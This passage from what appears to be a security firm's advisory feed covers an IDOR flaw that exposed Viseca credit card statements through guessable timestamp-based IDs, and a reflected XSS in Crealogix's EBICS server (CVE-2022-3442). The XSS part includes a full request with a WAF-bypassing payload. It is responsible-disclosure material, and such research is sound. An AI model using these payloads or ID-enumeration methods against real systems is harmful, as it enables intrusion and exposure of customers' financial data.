&lt;a id="rest_code_57683b6304b741708a9b79ec15c2d7c2-5" name="rest_code_57683b6304b741708a9b79ec15c2d7c2-5" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_57683b6304b741708a9b79ec15c2d7c2-5"&gt;&lt;/a&gt;Create Date                     : 2022:10:22 09:35:36+01:00
&lt;a id="rest_code_57683b6304b741708a9b79ec15c2d7c2-6" name="rest_code_57683b6304b741708a9b79ec15c2d7c2-6" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_57683b6304b741708a9b79ec15c2d7c2-6"&gt;&lt;/a&gt;Modify Date                     : 2022:10:22 09:35:36+01:00
&lt;a id="rest_code_57683b6304b741708a9b79ec15c2d7c2-7" name="rest_code_57683b6304b741708a9b79ec15c2d7c2-7" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_57683b6304b741708a9b79ec15c2d7c2-7"&gt;&lt;/a&gt;[...]
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;By writing the &lt;code class="docutils literal"&gt;visecaStatementId&lt;/code&gt; and the &lt;code class="docutils literal"&gt;create date&lt;/code&gt; of the PDF above each other and inserting spaces shows that the &lt;code class="docutils literal"&gt;visecaStatementId&lt;/code&gt; has very little entropy as it includes a full timestamp including hour, minutes and seconds:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_e6b493e0207546ee9832d645efd25159-1" name="rest_code_e6b493e0207546ee9832d645efd25159-1" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_e6b493e0207546ee9832d645efd25159-1"&gt;&lt;/a&gt;2022 10 22 09 35 36 019983 (visecaStatementId)
&lt;a id="rest_code_e6b493e0207546ee9832d645efd25159-2" name="rest_code_e6b493e0207546ee9832d645efd25159-2" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_e6b493e0207546ee9832d645efd25159-2"&gt;&lt;/a&gt;2022:10:22 09:35:36+01:00 (Create Date)
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The timezone (+01) seems to be just a coincidence that it matches with the number in the &lt;code class="docutils literal"&gt;visecaStatementId&lt;/code&gt;. The last six digits for Pentagrid in the last few monthly statements were:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-1" name="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-1" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_34b59d10bd594cd9b1903fa8d838f1e9-1"&gt;&lt;/a&gt;2021-10: 025323
&lt;a id="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-2" name="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-2" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_34b59d10bd594cd9b1903fa8d838f1e9-2"&gt;&lt;/a&gt;2021-11: 021534
&lt;a id="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-3" name="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-3" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_34b59d10bd594cd9b1903fa8d838f1e9-3"&gt;&lt;/a&gt;2021-12: 020879
&lt;a id="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-4" name="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-4" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_34b59d10bd594cd9b1903fa8d838f1e9-4"&gt;&lt;/a&gt;2022-01: 020786
&lt;a id="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-5" name="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-5" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_34b59d10bd594cd9b1903fa8d838f1e9-5"&gt;&lt;/a&gt;2022-02: 021019
&lt;a id="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-6" name="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-6" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_34b59d10bd594cd9b1903fa8d838f1e9-6"&gt;&lt;/a&gt;2022-03: 020725
&lt;a id="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-7" name="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-7" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_34b59d10bd594cd9b1903fa8d838f1e9-7"&gt;&lt;/a&gt;2022-04: 025125
&lt;a id="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-8" name="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-8" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_34b59d10bd594cd9b1903fa8d838f1e9-8"&gt;&lt;/a&gt;2022-05: 020649
&lt;a id="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-9" name="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-9" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_34b59d10bd594cd9b1903fa8d838f1e9-9"&gt;&lt;/a&gt;2022-06: 020541
&lt;a id="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-10" name="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-10" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_34b59d10bd594cd9b1903fa8d838f1e9-10"&gt;&lt;/a&gt;2022-07: 024985
&lt;a id="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-11" name="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-11" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_34b59d10bd594cd9b1903fa8d838f1e9-11"&gt;&lt;/a&gt;2022-08: 019883
&lt;a id="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-12" name="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-12" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_34b59d10bd594cd9b1903fa8d838f1e9-12"&gt;&lt;/a&gt;2022-09: 025733
&lt;a id="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-13" name="rest_code_34b59d10bd594cd9b1903fa8d838f1e9-13" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_34b59d10bd594cd9b1903fa8d838f1e9-13"&gt;&lt;/a&gt;2022-10: 019983
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;These digits do not include a lot of entropy and seem to vary between the numbers 19983 and 25733. These numbers are assumed to be incrementing IDs per month over all statements of all customers.&lt;/p&gt;
&lt;p&gt;Therefore, Pentagrid concludes that the &lt;code class="docutils literal"&gt;visecaStatementId&lt;/code&gt; is just a timestamp of the creation date of the PDF plus six digits. As credit card statements are likely to be created in sequence as a massive batch job, the entropy of the &lt;code class="docutils literal"&gt;visecaStatementId&lt;/code&gt; is even lower than expected.&lt;/p&gt;
&lt;p&gt;Unfortunately, this endpoint on the webserver did not support HTTP HEAD, Range, If-Modified-Since or other HTTP request techniques that would have allowed Pentagrid to get metadata information about a PDF file (e.g. their byte length in the Content-Length header) or a side-channel (e.g. response time difference) without receiving the full PDF. The full PDF includes sensitive information of third-parties and therefore we did not want to access this data. This prevented us from brute-forcing &lt;code class="docutils literal"&gt;visecaStatementId&lt;/code&gt; to prove our point: It is assumed that when the last six digits would be incremented or decremented, PDF credit card statements of other companies could be downloaded.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="precondition"&gt;
&lt;h2&gt;Precondition&lt;/h2&gt;
&lt;p&gt;There were no special preconditions for exploitation, it was feasible for every user on the Internet. An attacker had to know timestamps when credit card statements were created, for example by having legitimate access to statements or by guessing or brute-forcing.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="recommendation"&gt;
&lt;h2&gt;Recommendation&lt;/h2&gt;
&lt;p&gt;During the disclosure process Pentagrid recommended Viseca to:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Take the expense portal offline immediately until the issue is resolved or prevent the portal from acquiring Viseca credit card statements.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Contact the third-party who is running the affected service and require an emergency change to fix the issue.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Start an investigation if the issue was exploited in the past.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Check the regulatory obligations that might apply in case of such an issue and take appropriate actions.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Check if Web Application Firewall (WAF) rules could be put in place that prevent or mitigate the issue from arising in the future.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Conduct security measures such as contracting a third-party to do a security analysis of the issue including code review to identify potential further issues.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Pentagrid recommended Fiserv to:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Take the expense portal offline immediately until the issue is resolved.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Do a root cause analysis of the security issue and fix it (e.g. check the role concept, authentication and authorisation model of the website).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Conduct security measures such as contracting a third-party to do a security analysis of the issue including code review to identify potential further issues.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Start an investigation if the issue was exploited in the past.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Check the regulatory obligations that might apply in case of such an issue and take appropriate actions.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Pentagrid recommends business customers to:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Take the usual precautions regarding credit card fraud.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Check the regulatory obligations that might apply in case of such an issue and take appropriate actions.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="resolution"&gt;
&lt;h2&gt;Resolution&lt;/h2&gt;
&lt;p&gt;According to Viseca, the following actions took place:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Contacted the third-party who is running the affected service and requested an emergency change to resolve the issue.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Analyzed log files for any signs the vulnerability had been exploited and found no indication of unauthorized access or disclosure of customer information.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Checked wether regulatory notifications are required and, if so, take required actions.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Checked if Web Application Firewall (WAF) rules could be put in place to prevent or mitigate the similar issues from arising in the future.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Conducted security measures such as contracting a third-party to do a security analysis of the issue including code review to identify potential further issues.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;According to Viseca, the owner took the following actions:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Conducted a root cause analysis of the security issue and resolved it.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Conducted security measures such as contracting a third-party to do a security analysis of the issue including code review to identify potential further issues.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="credits"&gt;
&lt;h2&gt;Credits&lt;/h2&gt;
&lt;p&gt;The vulnerability has been found by Pentagrid.&lt;/p&gt;
&lt;/section&gt;</description><category>Advisory</category><category>Exploit</category><category>IDOR</category><category>Privacy</category><category>Vulnerability</category><guid>https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/</guid><pubDate>Mon, 20 Mar 2023 03:23:42 GMT</pubDate></item><item><title>Reflected cross-site scripting vulnerability in Crealogix EBICS implementation (CVE-2022-3442)</title><link>https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;figure&gt;&lt;img src="https://www.pentagrid.ch/images/default_preview_image.jpeg"&gt;&lt;/figure&gt; &lt;p&gt;During a penetration test of an Electronic Banking Internet Communication Standard (EBICS) environment, Pentagrid observed a vulnerability in the EBICS banking implementation developed by CREALOGIX AG and used by many banks. EBICS is a common standard in Germany, France and Switzerland for sending payment information from customers to banks and between banks.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;section id="impact"&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;p&gt;This reflected Cross-Site Scripting (XSS) vulnerability has an unknown impact, as the different EBICS client software were not in scope of the analysis and the impact depends on EBICS server deployment details as well.&lt;/p&gt;
&lt;p&gt;Cross-Site-Scripting allows an attacker to execute JavaScript in the attacked origin, allowing the attacker to act like the exploited user of the website.&lt;/p&gt;
&lt;p&gt;The issues is assumed to have a low to medium impact in most common deployment scenarios as the used domain for EBICS in the observed deployments was a subdomain of the main domain. This subdomain is usually not further used in the web/browser context as a web application.&lt;/p&gt;
&lt;p&gt;Additionally, the EBICS protocol does not rely on common browser security aspects:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;XML signatures are used for authentication instead of cookies.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;HTTP security headers (e.g. HSTS) are ignored in at least one tested EBICS client.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The EBICS client is usually not implemented as a website but as a standalone fat client software. The impact on EBICS client software would have to be analysed for each EBICS client individually. Moreover, it is unknown to Pentagrid if EBICS client software commonly support Inter Process Communication (IPC) mechanisms (e.g. URL handlers) that would allow an attacker to trigger the XSS in the EBICS client. Furthermore, the attacker would need to be able to use the XSS for exploitation in the EBICS client, which is again an individual aspect of each EBICS client.&lt;/p&gt;
&lt;p&gt;Therefore, Pentagrid concludes there are several reasons why the impact might be elevated to a higher level by an attacker:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;If the deployment is not on a separte EBICS subdomain, the domain might be in use for other web applications and therefore that web application origin would be affected by the XSS.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;If the issue is combined with other vulnerabilities such as other web applications on other subdomains setting sensitive cookies on the parent domain without the httpOnly flag.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;If an EBICS client could be exploited with the XSS, e.g. via IPC mechanisms or if the EBICS client is implemented as a web application. With the move to more browser-based solutions for accounting, it is getting more likely that EBICS client support is built into accounting web applications acting as EBICS clients.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The exact impact would need to be investigated on a per EBICS server and EBICS client deployment basis.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="timeline"&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;2022-08-12: Initial contact of CIO of Crealogix via E-mail.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-08-12: Crealogix replied that the EBICS software team was informed and additional organisational details were shared.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-08-15: Pentagrid communicates details of vulnerability. Crealogix replied that the analysis started.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-08-24: Pentagrid informs Crealogix of latest disclosure date 2022-11-21. Crealogix replies they are already working on a fix.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-09-28: Pentagrid requests status update. Crealogix replies the issue was fixed, a patched version released and installed for customers where Crealogix is responsible for operation. Pentagrid verifies fix and that it was deployed for one particular installation.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-10-06: Pentagrid asks for which versions were fixed and if an earlier release than the 90 days deadline is possible.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-10-07: Crealogix informs that a fix is available for version 7.1 and agrees to early release.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-10-10: Public release of advisory. CVE-2022-3442 was assigned to this issue.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2024-03-18: Added link to OWASP Core Rule Set ticket.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="affected-components"&gt;
&lt;h2&gt;Affected Components&lt;/h2&gt;
&lt;p&gt;Affected of the XSS issue is the &lt;cite&gt;ebics.aspx&lt;/cite&gt; server-side script of the CREALOGIX EBICS server solution, usually hosted on &lt;cite&gt;/ebics-server/ebics.aspx&lt;/cite&gt;.&lt;/p&gt;
&lt;p&gt;Not affected are other software vendors such as those using server-sides usually hosted on &lt;cite&gt;/ebicsweb/ebicsweb&lt;/cite&gt;.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="technical-details"&gt;
&lt;h2&gt;Technical Details&lt;/h2&gt;
&lt;p&gt;Several tested instances of EBICS servers were found to deploy a Web Application Firewall (WAF) blocking certain attack payloads. All the used payloads in this advisory are payloads that were able to bypass the encountered WAFs. If no WAF is present, even simpler payloads can be used.&lt;/p&gt;
&lt;p&gt;The following EBICS request includes an invalid EBICS version that is a XSS payload executing the &lt;cite&gt;print&lt;/cite&gt; command in JavaScript:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Source:&lt;/strong&gt; EBICS HTTPS request to the vulnerable EBICS server with some customer details masked in the example&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-1" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-1" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-1"&gt;&lt;/a&gt;POST /ebics-server/ebics.aspx HTTP/1.1
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-2" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-2" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-2"&gt;&lt;/a&gt;Content-Type: text/xml; charset=UTF-8
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-3" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-3" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-3"&gt;&lt;/a&gt;Host: www.example.org
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-4" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-4" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-4"&gt;&lt;/a&gt;Content-Length: 585
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-5" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-5" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-5"&gt;&lt;/a&gt;Connection: close
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-6" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-6" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-6"&gt;&lt;/a&gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-7" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-7" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-7"&gt;&lt;/a&gt;&amp;lt;?xml version="1.0" encoding="utf-8" standalone="no"?&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-8" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-8" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-8"&gt;&lt;/a&gt;&amp;lt;ebicsUnsecuredRequest xmlns="urn:org:ebics:H004" Revision="1" Version="&amp;amp;lt;a autofocus onfocus=print(1) href&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;;"&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-9" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-9" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-9"&gt;&lt;/a&gt;    &amp;lt;header authenticate="true"&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-10" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-10" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-10"&gt;&lt;/a&gt;        &amp;lt;static&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-11" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-11" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-11"&gt;&lt;/a&gt;            &amp;lt;HostID&amp;gt;XXX&amp;lt;/HostID&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-12" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-12" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-12"&gt;&lt;/a&gt;            &amp;lt;PartnerID&amp;gt;XXX&amp;lt;/PartnerID&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-13" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-13" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-13"&gt;&lt;/a&gt;            &amp;lt;UserID&amp;gt;XXX&amp;lt;/UserID&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-14" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-14" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-14"&gt;&lt;/a&gt;            &amp;lt;Product InstituteID="XXX" Language="de"&amp;gt;XXX&amp;lt;/Product&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-15" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-15" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-15"&gt;&lt;/a&gt;            &amp;lt;OrderDetails&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-16" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-16" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-16"&gt;&lt;/a&gt;                &amp;lt;OrderType&amp;gt;XXX&amp;lt;/OrderType&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-17" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-17" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-17"&gt;&lt;/a&gt;                &amp;lt;OrderAttribute&amp;gt;XXX&amp;lt;/OrderAttribute&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-18" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-18" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-18"&gt;&lt;/a&gt;            &amp;lt;/OrderDetails&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-19" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-19" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-19"&gt;&lt;/a&gt;            &amp;lt;SecurityMedium&amp;gt;0000&amp;lt;/SecurityMedium&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-20" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-20" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-20"&gt;&lt;/a&gt;        &amp;lt;/static&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-21" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-21" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-21"&gt;&lt;/a&gt;        &amp;lt;mutable/&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-22" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-22" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-22"&gt;&lt;/a&gt;    &amp;lt;/header&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-23" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-23" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-23"&gt;&lt;/a&gt;    &amp;lt;body&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-24" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-24" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-24"&gt;&lt;/a&gt;        &amp;lt;DataTransfer&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-25" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-25" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-25"&gt;&lt;/a&gt;            &amp;lt;OrderData&amp;gt;XXX&amp;lt;/OrderData&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-26" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-26" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-26"&gt;&lt;/a&gt;        &amp;lt;/DataTransfer&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-27" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-27" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-27"&gt;&lt;/a&gt;    &amp;lt;/body&amp;gt;
&lt;a id="rest_code_413f339811224bbbb6220e7cafbc7b1f-28" name="rest_code_413f339811224bbbb6220e7cafbc7b1f-28" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_413f339811224bbbb6220e7cafbc7b1f-28"&gt;&lt;/a&gt;&amp;lt;/ebicsUnsecuredRequest&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The server will respond with the following error message with a &lt;cite&gt;Content-Type&lt;/cite&gt; of &lt;cite&gt;text/html&lt;/cite&gt;, making it exploitable in browsers:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-1" name="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-1" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-1"&gt;&lt;/a&gt;HTTP/1.1 200 OK
&lt;a id="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-2" name="rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-2" href="https://www.pentagrid.ch/en/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/#rest_code_e6a2c0b99d1040328c0e99b970ec7e7e-2"&gt;&lt;/a&gt;Cache-Control: private
